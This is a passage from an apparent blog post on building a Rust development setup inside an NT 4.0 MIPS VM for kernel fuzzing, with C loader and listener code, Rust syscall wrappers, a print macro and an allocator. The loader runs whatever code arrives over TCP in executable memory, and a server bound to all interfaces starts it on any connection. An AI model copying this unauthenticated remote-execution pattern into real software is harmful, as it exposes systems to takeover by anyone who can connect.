<span class="n">end</span> <span class="o">=</span> <span class="n">base</span> <span class="o">+</span> <span class="p">(</span><span class="n">len</span> <span class="o">-</span> <span class="mi">3</span> <span class="o">*</span> <span class="mi">8</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Loading at %x-%x (%x) entry %x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">base</span><span class="p">,</span> <span class="n">end</span><span class="p">,</span> <span class="n">end</span> <span class="o">-</span> <span class="n">base</span><span class="p">,</span> <span class="n">entry</span><span class="p">);</span>
<span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">align_base</span> <span class="o">=</span> <span class="n">base</span> <span class="o">&</span> <span class="o">~</span><span class="mh">0xffff</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">align_end</span> <span class="o">=</span> <span class="p">(</span><span class="n">end</span> <span class="o">+</span> <span class="mh">0xffff</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="mh">0xffff</span><span class="p">;</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">alloc</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">align_base</span><span class="p">,</span>
<span class="n">align_end</span> <span class="o">-</span> <span class="n">align_base</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span>
<span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Alloc attempt %x-%x (%x) | Got %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
<span class="n">align_base</span><span class="p">,</span> <span class="n">align_end</span><span class="p">,</span> <span class="n">align_end</span> <span class="o">-</span> <span class="n">align_base</span><span class="p">,</span> <span class="n">alloc</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">alloc</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">align_base</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"VirtualAlloc() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Copy in the code</span>
<span class="n">memcpy</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">base</span><span class="p">,</span> <span class="n">ptr</span><span class="p">,</span> <span class="n">end</span> <span class="o">-</span> <span class="n">base</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Jump to the entry</span>
<span class="p">((</span><span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="p">)(</span><span class="n">SOCKET</span><span class="p">))</span><span class="n">entry</span><span class="p">)(</span><span class="n">sock</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>It’s not the best quality code, but it gets the job done. Nevertheless, this
allows us to run whatever Rust program we develop in the VM! Running this
client executable is all we need now.</p>
<h4 id="remote-remote-code-execution">Remote remote code execution</h4>
<p>Unfortunately, having to switch to the VM, hit up arrow, and enter, is honestly
a lot more than I want to have in my build process. I kind of think any build,
dev, and test cycle that takes longer than a few seconds is just too painful
to use. I don’t really care how complex the project is. In
<a href="https://github.com/gamozolabs/chocolate_milk">Chocolate Milk</a> I demonstrated
that I could build, upload to my server, hot replace, download Windows VM
images, and launch hundreds of Windows VMs as part of my sub-2-second build
process. This is an OS and hypervisor with hotswapping and re-launching
of hundreds of Windows VMs in seconds (I think milliseconds for the upload,
hot swap, and Windows VM launches if you ignore the 1-2 second Rust build).
There’s just no excuse for shitty build and test processes for small projects
like this.</p>
<p>Okay, very subtle flex aside, we need a better process. Luckily, we can
remotely execute our remote code. To do this I created a server that runs
inside the guest that waits for connections. On a connection it simply calls
<code class="language-plaintext highlighter-rouge">CreateProcess()</code> and launches the client we talked about before. Now, we can
“poke” the guest by simply connecting and disconnecting to the TCP port we
forwarded.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>
</span>
<span class="kt">int</span>
<span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SOCKET</span> <span class="n">sock</span><span class="p">;</span>
<span class="n">WSADATA</span> <span class="n">wsaData</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sockaddr</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="c1">// Initialize WSA</span>
<span class="k">if</span><span class="p">(</span><span class="n">WSAStartup</span><span class="p">(</span><span class="n">MAKEWORD</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">),</span> <span class="o">&</span><span class="n">wsaData</span><span class="p">))</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"WSAStartup() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Create TCP socket</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="n">IPPROTO_TCP</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">sock</span> <span class="o">==</span> <span class="n">INVALID_SOCKET</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"socket() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="s">"0.0.0.0"</span><span class="p">);</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="mi">42069</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">bind</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">sockaddr</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sockaddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sockaddr</span><span class="p">))</span> <span class="o">==</span> <span class="n">SOCKET_ERROR</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"bind() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Listen for connections</span>
<span class="k">if</span><span class="p">(</span><span class="n">listen</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span> <span class="o">==</span> <span class="n">SOCKET_ERROR</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"listen() error : %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Wait for a client</span>
<span class="k">for</span><span class="p">(</span> <span class="p">;</span> <span class="p">;</span> <span class="p">)</span> <span class="p">{</span>
<span class="n">STARTUPINFO</span> <span class="n">si</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">PROCESS_INFORMATION</span> <span class="n">pi</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">SOCKET</span> <span class="n">client</span> <span class="o">=</span> <span class="n">accept</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="c1">// Upon getting a TCP connection, just start</span>
<span class="c1">// a separate client process. This way the</span>
<span class="c1">// client can crash and burn and this server</span>
<span class="c1">// stays running just fine.</span>
<span class="n">CreateProcess</span><span class="p">(</span>
<span class="s">"client.exe"</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="n">FALSE</span><span class="p">,</span>
<span class="n">CREATE_NEW_CONSOLE</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span>
<span class="o">&</span><span class="n">si</span><span class="p">,</span>
<span class="o">&</span><span class="n">pi</span>
<span class="p">);</span>
<span class="c1">// We don't even transfer data, we just care about</span>
<span class="c1">// the connection kicking off a client.</span>
<span class="n">closesocket</span><span class="p">(</span><span class="n">client</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Very fancy code. Anyways with this in place, now we can just add a
<code class="language-plaintext highlighter-rouge">nc -w 0 127.0.0.1 5555</code> to our <code class="language-plaintext highlighter-rouge">Makefile</code>, and now the VM will download and
run the new code we build. Combine this with <code class="language-plaintext highlighter-rouge">cargo watch</code> and now when we
save one of the Rust files we’re working on, it’ll build, poke the VM, and
run it! A simple <code class="language-plaintext highlighter-rouge">:w</code> and we have instant results from the VM!</p>
<p>(If you’re wondering, we create the client in a different process so we don’t
lose the server if the client crashes, which it will)</p>
<h2 id="rust-without-os-support">Rust without OS support</h2>
<p>Rust is designed to have a split of some of the core features of the language.
There’s <code class="language-plaintext highlighter-rouge">core</code> which contains the bare essentials to have a usable language,
<code class="language-plaintext highlighter-rouge">alloc</code> which gives you access to dynamic allocations, and <code class="language-plaintext highlighter-rouge">std</code> which gives
you a OS-agnostic wrapper of common OS-level constructions like files, threads,
and sockets.</p>
<p>Unfortunately, Rust doesn’t have support for NT4.0 on MIPS, so we immediately
don’t have the ability to use <code class="language-plaintext highlighter-rouge">std</code>. However, we can still use <code class="language-plaintext highlighter-rouge">core</code> and
<code class="language-plaintext highlighter-rouge">alloc</code> with a small amount of work.</p>
<p>Rust has one of the best cross-compiling supports of any compiler, as you
can simply have Rust build <code class="language-plaintext highlighter-rouge">core</code> for your target, even if you don’t have the
pre-compiled package. <code class="language-plaintext highlighter-rouge">core</code> is simple enough that it’s a few second build
process, so it doesn’t really complicate your build. Seriously, look how cool
this is:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cargo new <span class="nt">--bin</span> rustexample
</code></pre></div></div>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#![no_std]</span>
<span class="nd">#![no_main]</span>
<span class="nd">#[panic_handler]</span>
<span class="k">fn</span> <span class="nf">panic_handler</span><span class="p">(</span><span class="mi">_</span><span class="n">info</span><span class="p">:</span> <span class="o">&</span><span class="nn">core</span><span class="p">::</span><span class="nn">panic</span><span class="p">::</span><span class="n">PanicInfo</span><span class="p">)</span> <span class="k">-></span> <span class="o">!</span> <span class="p">{</span>
<span class="k">loop</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="nd">#[no_mangle]</span>
<span class="k">pub</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="k">fn</span> <span class="mi">__</span><span class="nf">start</span><span class="p">()</span> <span class="k">-></span> <span class="o">!</span> <span class="p">{</span>
<span class="nd">unimplemented!</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@gamey ~/rustexample <span class="nv">$ </span>cargo build <span class="nt">--target</span> mipsel-unknown-none <span class="nt">-Zbuild-std</span><span class="o">=</span>core
Compiling core v0.0.0 <span class="o">(</span>/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core<span class="o">)</span>
Compiling compiler_builtins v0.1.49
Compiling rustc-std-workspace-core v1.99.0 <span class="o">(</span>/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/rustc-std-workspace-core<span class="o">)</span>
Compiling rustexample v0.1.0 <span class="o">(</span>/home/pleb/rustexample<span class="o">)</span>
Finished dev <span class="o">[</span>unoptimized + debuginfo] target<span class="o">(</span>s<span class="o">)</span> <span class="k">in </span>8.84s
</code></pre></div></div>
<p>And there you go, you have a Rust binary for <code class="language-plaintext highlighter-rouge">mipsel-unknown-none</code> without
having to download any pre-built toolchains, a libc, anything. You can
immediately start building your program, using Rust-level constructs like
slices and arrays with bounds checking, closures, whatever. No libc, no
pre-built target-specific toolchains, nothing.</p>
<h2 id="os-development-in-user-land">OS development in user-land</h2>
<p>For educational reasons, and totally not because I just find it more fun, I
decided that this project would not leverage the existing C libraries we have
that do indeed exist in the MIPS guest. We could of course write PE importers
to leverage the existing <code class="language-plaintext highlighter-rouge">kernel32.dll</code> and <code class="language-plaintext highlighter-rouge">user32.dll</code> present in all Windows
processes by default, but no, that’s not fun. We can justify this by saying
that the goal of this project is to fuzz the NT kernel, and thus we need to
understand what syscalls look like.</p>
<p>So, with that in mind, we’re basically on our own. We’re effectively writing an
OS in user-land, as we have absolutely no libraries or features by default. We
have to write our inline assembly and work with raw pointers to bootstrap our
execution environment for Rust.</p>
<p>The very first thing we need is a way of outputting debug information. I don’t
care how we do this. It could be a file, a socket, the stdout, who cares. To
do this, we’ll need to ask the kernel to do something via a syscall.</p>
<h3 id="syscall-layer">Syscall Layer</h3>
<p>To invoke syscalls, we need to conform to a somewhat “custom” calling
convention. System calls effectively are always indexed by some integer,
selecting the API that you want to invoke. In the case of MIPS this is put into
the <code class="language-plaintext highlighter-rouge">$v0</code> register, which is not normally used as a calling convention. Thus,
to perform a syscall with this modified convention, we have to use some
assembly. Luckily, the rest of the calling convention for syscalls is
unmodified from the standard MIPS <code class="language-plaintext highlighter-rouge">o32</code> ABI, and we can pass through everything
else.</p>
<p>To pass everything as is to the syscall we actually have to make sure Rust
is using the same ABI as the kernel, we do this by declaring our function as
<code class="language-plaintext highlighter-rouge">extern</code>, which switches us to the default MIPS <code class="language-plaintext highlighter-rouge">o32</code> C ABI. Technically I
think Windows does floating point register passing different than <code class="language-plaintext highlighter-rouge">o32</code>, but
we’ll cross that bridge when we get there.</p>
<p>We need to be confident that the compiler is not emitting some weird prologue
or moving around registers in our syscall function, and luckily Rust comes
to the rescue again with a <code class="language-plaintext highlighter-rouge">#[naked]</code> function decorator. This marks the
function as never inline-able, but also guarantees that no prolog or epilog are
present in the function. This is common in a lot of low level languages, but
Rust goes a step further and requires that naked functions only contain a
single assembly statement that must not return (you must manually handle the
return), and that your assembly is the first code that executes. Ultimately,
it’s really just a global label on inline assembly with type information.
Sweet.</p>
<p>So, we simply have to write a syscall helper for each number of arguments we
want to support like such:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// 2-argument syscall</span>
<span class="nd">#[allow(unused)]</span>
<span class="nd">#[naked]</span>
<span class="k">pub</span> <span class="k">unsafe</span> <span class="k">extern</span> <span class="k">fn</span> <span class="nf">syscall2</span><span class="p">(</span><span class="mi">_</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="mi">_</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="n">id</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-></span> <span class="nb">usize</span> <span class="p">{</span>
<span class="nd">asm!</span><span class="p">(</span><span class="s">r#"
move $v0, $a2
syscall
"#</span><span class="p">,</span> <span class="nf">options</span><span class="p">(</span><span class="n">noreturn</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We mark the function as naked, pass in the syscall ID as the last parameter
(as to not disturb the ordering of the earlier parameters which we pass through
to the syscall), move the syscall ID to <code class="language-plaintext highlighter-rouge">$v0</code>, and invoke the syscall. Weirdly,
for MIPS, the syscall does not return to the instruction after the <code class="language-plaintext highlighter-rouge">syscall</code>,
it actually returns to <code class="language-plaintext highlighter-rouge">$ra</code>, the return address, so it’s critical that the
function is never inlined as this wrapper relies on returning back to the
call site of the caller of <code class="language-plaintext highlighter-rouge">syscall2()</code>. Luckily, naked ensures this for us,
and thus this wrapper is sufficient for syscalls!</p>
<h3 id="getting-output">Getting output</h3>
<p>Back to the console, we initially started with trying to do stdout, but
according to Twitch chat it sounds like old Windows this was actually done via
some RPC with conhost. So, we abandoned that. We wrote a tiny example of using
a <code class="language-plaintext highlighter-rouge">NtOpenFile()</code> and <code class="language-plaintext highlighter-rouge">NtWriteFile()</code> syscall to drop a file to disk with a log,
and this was a cool example of early syscalls, but still not convenient.</p>
<p>Remember, I’m picky about the development cycle.</p>
<p>So, we decided to go with a socket for our final build. Unfortunately, creating
a socket in Windows via syscalls is actually pretty hard (I think it’s done
mainly over IOCTLs), but we cheated here and just passed the handle from the
FELF loader that already had to connect to our host. We can simply change our
FELF server to serve the FELF to the VM and then <code class="language-plaintext highlighter-rouge">recv()</code> forever, printing out
the console output. Now we have a remote console output.</p>
<h3 id="windows-syscalls">Windows Syscalls</h3>
<p>Windows syscalls are a lot heavier than what you might be used to on UNIX, they
are also sometimes undocumented. Luckily, the <code class="language-plaintext highlighter-rouge">NtWriteFile()</code> syscall that
we really need is actually not too bad. It takes a file handle, some optional
stuff we don’t care about, an <code class="language-plaintext highlighter-rouge">IO_STATUS_BLOCK</code> (which returns number of
bytes written), a buffer, a length, and an offset in the file to write to.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Write to a file</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">write</span><span class="p">(</span><span class="n">fd</span><span class="p">:</span> <span class="o">&</span><span class="n">Handle</span><span class="p">,</span> <span class="n">bytes</span><span class="p">:</span> <span class="k">impl</span> <span class="n">AsRef</span><span class="o"><</span><span class="p">[</span><span class="nb">u8</span><span class="p">]</span><span class="o">></span><span class="p">)</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span> <span class="p">{</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0u64</span><span class="p">;</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">iosb</span> <span class="o">=</span> <span class="nn">IoStatusBlock</span><span class="p">::</span><span class="nf">default</span><span class="p">();</span>
<span class="c">// Perform syscall</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">NtStatus</span><span class="p">(</span><span class="k">unsafe</span> <span class="p">{</span>
<span class="nf">syscall9</span><span class="p">(</span>
<span class="c">// [in] HANDLE FileHandle</span>
<span class="n">fd</span><span class="na">.0</span><span class="p">,</span>
<span class="c">// [in, optional] HANDLE Event</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, optional] PIO_APC_ROUTINE ApcRoutine,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, optional] PVOID ApcContext,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// [out] PIO_STATUS_BLOCK IoStatusBlock,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">iosb</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] PVOID Buffer,</span>
<span class="n">bytes</span><span class="nf">.as_ref</span><span class="p">()</span><span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG Length,</span>
<span class="n">bytes</span><span class="nf">.as_ref</span><span class="p">()</span><span class="nf">.len</span><span class="p">(),</span>
<span class="c">// [in, optional] PLARGE_INTEGER ByteOffset,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">offset</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in, optional] PULONG Key</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// Syscall number</span>
<span class="nn">Syscall</span><span class="p">::</span><span class="n">WriteFile</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span>
<span class="p">}</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">);</span>
<span class="c">// If success, return number of bytes written, otherwise return error</span>
<span class="k">if</span> <span class="n">status</span><span class="nf">.success</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">Ok</span><span class="p">(</span><span class="n">iosb</span><span class="py">.information</span><span class="p">)</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nf">Err</span><span class="p">(</span><span class="n">status</span><span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="rust-print-and-formatting">Rust <code class="language-plaintext highlighter-rouge">print!()</code> and formatting</h3>
<p>To use Rust in the best way possible, we want to have support for the
<code class="language-plaintext highlighter-rouge">print!()</code> macro, this is the <code class="language-plaintext highlighter-rouge">printf()</code> of the Rust world. It happens to be
really easy to add support for!</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Writer structure that simply implements [`core::fmt::Write`] such that we</span>
<span class="c">/// can use `write_fmt` in our [`print!`]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">Writer</span><span class="p">;</span>
<span class="k">impl</span> <span class="nn">core</span><span class="p">::</span><span class="nn">fmt</span><span class="p">::</span><span class="n">Write</span> <span class="k">for</span> <span class="n">Writer</span> <span class="p">{</span>
<span class="k">fn</span> <span class="nf">write_str</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">s</span><span class="p">:</span> <span class="o">&</span><span class="nb">str</span><span class="p">)</span> <span class="k">-></span> <span class="nn">core</span><span class="p">::</span><span class="nn">fmt</span><span class="p">::</span><span class="n">Result</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="nn">crate</span><span class="p">::</span><span class="nn">syscall</span><span class="p">::</span><span class="nf">write</span><span class="p">(</span><span class="k">unsafe</span> <span class="p">{</span> <span class="o">&</span><span class="n">SOCKET</span> <span class="p">},</span> <span class="n">s</span><span class="p">);</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c">/// Classic `print!()` macro</span>
<span class="nd">#[macro_export]</span>
<span class="nd">macro_rules!</span> <span class="n">print</span> <span class="p">{</span>
<span class="p">(</span><span class="nv">$</span><span class="p">(</span><span class="nv">$arg:tt</span><span class="p">)</span><span class="o">*</span><span class="p">)</span> <span class="k">=></span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="nn">core</span><span class="p">::</span><span class="nn">fmt</span><span class="p">::</span><span class="nn">Write</span><span class="p">::</span><span class="nf">write_fmt</span><span class="p">(</span>
<span class="o">&</span><span class="k">mut</span> <span class="nv">$crate</span><span class="p">::</span><span class="nn">print</span><span class="p">::</span><span class="n">Writer</span><span class="p">,</span> <span class="nn">core</span><span class="p">::</span><span class="nd">format_args!</span><span class="p">(</span><span class="nv">$</span><span class="p">(</span><span class="nv">$arg</span><span class="p">)</span><span class="o">*</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Simply create a dummy structure, implement <code class="language-plaintext highlighter-rouge">core::fmt::Write</code> on it, and now
you can directly use <code class="language-plaintext highlighter-rouge">Write::write_fmt()</code> to write format strings. All you
have to do is implement a sink for <code class="language-plaintext highlighter-rouge">&str</code>s, which is really just a <code class="language-plaintext highlighter-rouge">char*</code> and
a length. In our case, we invoke the <code class="language-plaintext highlighter-rouge">NtWriteFile()</code> syscall with our socket
we saved from the client.</p>
<p>Viola, we have remote output in a nice development environment:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@gamey ~/mipstest $ felfserv 0.0.0.0:1234 ./out.felf
Serving 6732 bytes to 192.168.1.2:45914
---------------------------------
Hello world from Rust at 0x13370790
</code></pre></div></div>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="p">(),</span> <span class="p">()</span><span class="o">></span> <span class="p">{</span>
<span class="nd">println!</span><span class="p">(</span><span class="s">"Hello world from Rust at {:#x}"</span><span class="p">,</span> <span class="n">main</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">);</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
</code></pre></div></div>
<p>It’s that easy!</p>
<h2 id="memory-allocation">Memory allocation</h2>
<p>Now that we have the basic ability to print things and use Rust, the next big
feature that we’re missing is the ability to dynamically allocate memory.
Luckily, we talked about the <code class="language-plaintext highlighter-rouge">alloc</code> feature of Rust before. Now, <code class="language-plaintext highlighter-rouge">alloc</code>
isn’t something you get for free. Rust doesn’t know how to allocate memory in
the environment you’re running it in, so you need to implement an allocator.</p>
<p>Luckily, once again, Rust is really friendly here. All you have to do is
implement the <code class="language-plaintext highlighter-rouge">GlobalAlloc</code> trait on a global structure. You implement an
<code class="language-plaintext highlighter-rouge">alloc()</code> function which takes in a <code class="language-plaintext highlighter-rouge">Layout</code> (size and alignment) and returns
a <code class="language-plaintext highlighter-rouge">*mut u8</code>, <code class="language-plaintext highlighter-rouge">NULL</code> on failure. Then you have a <code class="language-plaintext highlighter-rouge">dealloc()</code> where you get the
pointer that was used for the allocation, the <code class="language-plaintext highlighter-rouge">Layout</code> again (actually really
nice to know the size of the allocation at <code class="language-plaintext highlighter-rouge">free()</code> time) and that’s it.</p>
<p>Since we don’t care too much about the performance of our dynamic allocator,
we’ll just pass this information through directly to the NT kernel by doing
virtual memory maps and frees.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">alloc</span><span class="p">::</span><span class="nn">alloc</span><span class="p">::{</span><span class="n">Layout</span><span class="p">,</span> <span class="n">GlobalAlloc</span><span class="p">};</span>
<span class="c">/// Implementation of the global allocator</span>
<span class="k">struct</span> <span class="n">GlobalAllocator</span><span class="p">;</span>
<span class="c">/// Global allocator object</span>
<span class="nd">#[global_allocator]</span>
<span class="k">static</span> <span class="n">GLOBAL_ALLOCATOR</span><span class="p">:</span> <span class="n">GlobalAllocator</span> <span class="o">=</span> <span class="n">GlobalAllocator</span><span class="p">;</span>
<span class="k">unsafe</span> <span class="k">impl</span> <span class="n">GlobalAlloc</span> <span class="k">for</span> <span class="n">GlobalAllocator</span> <span class="p">{</span>
<span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">alloc</span><span class="p">(</span><span class="o">&</span><span class="k">self</span><span class="p">,</span> <span class="n">layout</span><span class="p">:</span> <span class="n">Layout</span><span class="p">)</span> <span class="k">-></span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span> <span class="p">{</span>
<span class="nn">crate</span><span class="p">::</span><span class="nn">syscall</span><span class="p">::</span><span class="nf">mmap</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">layout</span><span class="nf">.size</span><span class="p">())</span><span class="nf">.unwrap_or</span><span class="p">(</span><span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">null_mut</span><span class="p">())</span>
<span class="p">}</span>
<span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">dealloc</span><span class="p">(</span><span class="o">&</span><span class="k">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">,</span> <span class="mi">_</span><span class="n">layout</span><span class="p">:</span> <span class="n">Layout</span><span class="p">)</span> <span class="p">{</span>
<span class="nn">crate</span><span class="p">::</span><span class="nn">syscall</span><span class="p">::</span><span class="nf">munmap</span><span class="p">(</span><span class="n">addr</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to deallocate memory"</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>As for the syscalls, they’re honestly not too bad for this either that I won’t
go into more detail. You’ll notice these are similar to <code class="language-plaintext highlighter-rouge">VirtualAlloc()</code> that
is a common API in Windows development.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Allocate virtual memory in the current process</span>
